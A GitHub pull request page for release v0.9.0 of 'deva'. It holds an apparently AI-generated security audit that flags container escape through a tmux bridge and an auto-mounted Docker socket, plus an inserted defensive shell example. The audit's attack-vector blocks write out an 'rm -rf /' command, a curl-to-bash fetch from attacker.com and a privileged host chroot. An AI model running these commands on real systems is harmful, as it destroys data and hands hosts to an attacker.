chore: release v0.9.0#157

Merged
lroolle merged 1 commit into main from
release/v0.9.0
Jan 8, 2026

@lroolle lroolle commented Jan 8, 2026

Release v0.9.0

Added

  • tmux bridge for container-to-host tmux control
  • Gemini agent support
  • Docker-in-Docker auto-mount
  • Version management scripts
  • Build resilience (gh api vs curl)

Fixed

  • usermod error handling for mounted volumes
  • chmod 755 for script permissions

See CHANGELOG.md for full details.

- tmux bridge for container-to-host tmux control
- Gemini agent support
- Docker-in-Docker auto-mount
- Version management scripts
- Build resilience fixes
- usermod error handling improvements
Copilot AI review requested due to automatic review settings January 8, 2026 09:53

claude-yolo bot commented Jan 8, 2026

Claude finished @lroolle's task in 1m 37s


Security Audit Results - BLOCKING CRITICAL ISSUES FOUND 🛑

Audit Checklist:

  • Analyze changed files (CHANGELOG.md, deva.sh)
  • Review tmux bridge implementation for container escape risks
  • Examine Docker-in-Docker auto-mount security implications
  • Check authentication flow bypasses
  • Identify shell injection vectors
  • Assess privilege escalation paths
  • Document blocking issues and required tests

🔴 CRITICAL SECURITY ISSUES - MUST FIX BEFORE MERGE

1. CONTAINER ESCAPE: tmux Bridge (SEVERITY: CRITICAL)

  • Location: scripts/deva-bridge-tmux-host, scripts/deva-bridge-tmux
  • Issue: Intentional container escape mechanism via tmux control
  • Impact: Container can execute arbitrary commands on host via tmux send-keys, tmux run-shell
  • Code Evidence: Lines 12-14 in both scripts explicitly warn "Container gains full tmux control"
  • Risk: Complete host compromise despite containerization

Attack Vector:

# From inside container
deva-bridge-tmux &
tmux -S /tmp/host-tmux.sock send-keys -t 0 'rm -rf /' Enter
tmux -S /tmp/host-tmux.sock run-shell 'curl attacker.com/malware.sh | bash'

2. PRIVILEGE ESCALATION: Docker Socket Auto-Mount (SEVERITY: CRITICAL)

  • Location: deva.sh:662, documented in AGENTS.md:138-149
  • Issue: /var/run/docker.sock auto-mounted by default
  • Impact: Root-equivalent access to host, container escape via privileged containers
  • Code Evidence: DOCKER_ARGS+=(-v "/var/run/docker.sock:/var/run/docker.sock")
  • Mitigation: Requires explicit opt-out (--no-docker or DEVA_NO_DOCKER=1)

Attack Vector:

# From inside container with Docker socket
docker run --privileged -v /:/host alpine chroot /host /bin/bash

🟠 HIGH RISK FINDINGS

3. Authentication Bypass Paths

  • Gemini Agent: agents/gemini.sh:21 - Hardcoded --yolo flag bypasses all safety prompts
  • Path Traversal: agents/gemini.sh:58-70 - Insufficient CONFIG_ROOT validation allows ../ attacks
  • Credential Exposure: Multiple environment variables leaked to container without encryption

4. Shell Injection Vectors

  • tmux Socket: scripts/deva-bridge-tmux:131 - rm -f "$LOCAL_SOCK" without proper quoting
  • Environment Variables: All DEVA_BRIDGE_* variables passed through without sanitization
  • File Operations: Multiple chmod, mkdir operations using user-controlled paths

🟡 MEDIUM RISK FINDINGS

5. Error Handling Bypass

  • usermod suppression: docker-entrypoint.sh:196,207 - 2>/dev/null || true masks security failures
  • Silent failures: UID/GID changes may fail silently but container continues execution

⚠️ REQUIRED SECURITY TESTS BEFORE MERGE

  1. Container Escape Testing:

    • Verify tmux bridge can execute host commands
    • Test Docker socket privilege escalation
    • Confirm nested container breakout scenarios
  2. Authentication Security:

    • Test path traversal attacks via CONFIG_ROOT
    • Verify credential isolation between agents
    • Check for token/key leakage in logs
  3. Input Validation:

    • Fuzz all environment variables with shell metacharacters
    • Test socket path injection attacks
    • Verify proper sanitization of user inputs

📋 BLOCKING REQUIREMENTS

This PR MUST NOT be merged until:

  1. Explicit Security Acknowledgment - Add prominent warnings that these features intentionally weaken container boundaries
  2. Documentation Updates - Security implications must be clearly documented with attack scenarios
  3. Default Safety - tmux bridge and Docker socket mounting MUST be opt-in, not auto-enabled
  4. Input Sanitization - All user-controlled paths and environment variables need proper validation
  5. Audit Trail - Add logging for all privilege bridge usage

🎯 Recommendation: REJECT until security mitigations implemented

The tmux bridge and Docker socket auto-mount fundamentally compromise Deva's "container as sandbox" security model. While documented as intentional, the current implementation lacks sufficient safeguards against misuse.

Fix Priority:

  1. Make bridges opt-in only (require explicit --enable-tmux-bridge, --enable-docker)
  2. Add input validation and proper error handling
  3. Implement usage auditing and warnings
  4. Update documentation with clear attack scenarios
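
Added example, not part of the PR thread or the deva code base: one way to implement the CONFIG_ROOT path check and the opt-in Docker socket gate that the audit comment above asks for. The function names and the `ENABLE_DOCKER` variable are hypothetical; only the socket path and the `DOCKER_ARGS` line come from the comment.

```shell
#!/bin/sh
# Added illustration, not code from the deva repository. Function names and
# the opt-in convention are hypothetical.

# Print the canonical form of directory $1 and succeed only if it resolves
# to a location inside base directory $2. The body runs in a subshell, so
# the cd calls and variables do not leak into the caller.
validate_config_root() (
    case $1 in
        ''|*[[:cntrl:]]*) exit 1 ;;   # empty, or embeds newline/control chars
        /*) ;;                        # absolute paths only
        *) exit 1 ;;
    esac
    base=$(cd -- "$2" 2>/dev/null && pwd -P) || exit 1
    # cd + pwd -P collapses ../ segments and follows symlinks, so the check
    # below is made on where the path really points, not on its spelling.
    real=$(cd -- "$1" 2>/dev/null && pwd -P) || exit 1
    case $real/ in
        "$base"/*) printf '%s\n' "$real" ;;   # inside (or equal to) the base
        *) exit 1 ;;                          # escapes the base: reject
    esac
)

# Succeed only when mounting the Docker socket was explicitly requested
# ($1 = 1) and $2 (default /var/run/docker.sock) really is a Unix socket.
# Every grant is logged to stderr so privileged use leaves a trace.
docker_socket_mount_allowed() {
    [ "${1:-0}" = 1 ] || return 1     # default: no mount
    [ -S "${2:-/var/run/docker.sock}" ] || {
        echo "deva: ${2:-/var/run/docker.sock} is not a socket, refusing mount" >&2
        return 1
    }
    echo "deva: WARNING: Docker socket mount grants root-equivalent host access" >&2
}

# Caller side (bash, as in deva.sh), shown as a comment; ENABLE_DOCKER is a
# hypothetical opt-in variable:
#   if docker_socket_mount_allowed "${ENABLE_DOCKER:-0}"; then
#       DOCKER_ARGS+=(-v "/var/run/docker.sock:/var/run/docker.sock")
#   fi
```

The path check compares resolved locations with a trailing slash, so a sibling directory that merely shares the base's prefix is rejected along with `../` and symlink escapes.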

@lroolle lroolle merged commit 52fa110 into main Jan 8, 2026
5 of 6 checks passed
@lroolle lroolle deleted the release/v0.9.0 branch January 8, 2026 09:53
Copilot AI left a comment

Pull request overview

This is a release preparation PR that bumps the version from 0.8.0 to 0.9.0 and updates the changelog with the new release notes dated 2026-01-08.

  • Version number updated from 0.8.0 to 0.9.0 in the main script
  • CHANGELOG.md updated with comprehensive release notes documenting new features (tmux bridge, Gemini agent support, Docker-in-Docker auto-mount, version management scripts) and bug fixes (usermod error handling, script permissions)

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated no comments.

| File | Description |
|---|---|
| deva.sh | Updates VERSION constant from "0.8.0" to "0.9.0" |
| CHANGELOG.md | Adds v0.9.0 release notes with added features, fixes, and changes; minor formatting adjustment to v0.7.0 header |

@lroolle lroolle mentioned this pull request Jan 9, 2026